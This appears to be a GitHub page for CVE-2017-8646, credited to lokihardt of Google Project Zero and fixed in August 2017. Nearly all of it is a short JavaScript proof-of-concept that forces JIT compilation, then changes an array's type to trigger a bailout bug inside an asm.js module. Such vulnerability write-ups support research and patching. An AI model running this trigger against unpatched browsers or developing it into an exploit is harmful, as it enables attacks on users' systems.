Skip to content

Latest commit

 

History

History
33 lines (25 loc) · 639 Bytes

CVE-2017-8646.md

File metadata and controls

33 lines (25 loc) · 639 Bytes
Raw

CVE-2017-8646

  • Fix: Aug 2017
  • Credit: lokihardt of Google Project Zero

PoC

function asmModule() {
    'use asm';

    let a = [1, 2, 3, 4];
    for (let i = 0; i < 0x100000; i++) {  // JIT
        a[0] = 1;
        if (i === 0x30000) {
            a[0] = {};  // the array type changed, bailout!!
        }
    }

    function f(v) {
        v = v | 0;
        return v | 0;
    }
    return f;
}

asmModule(1);

Reference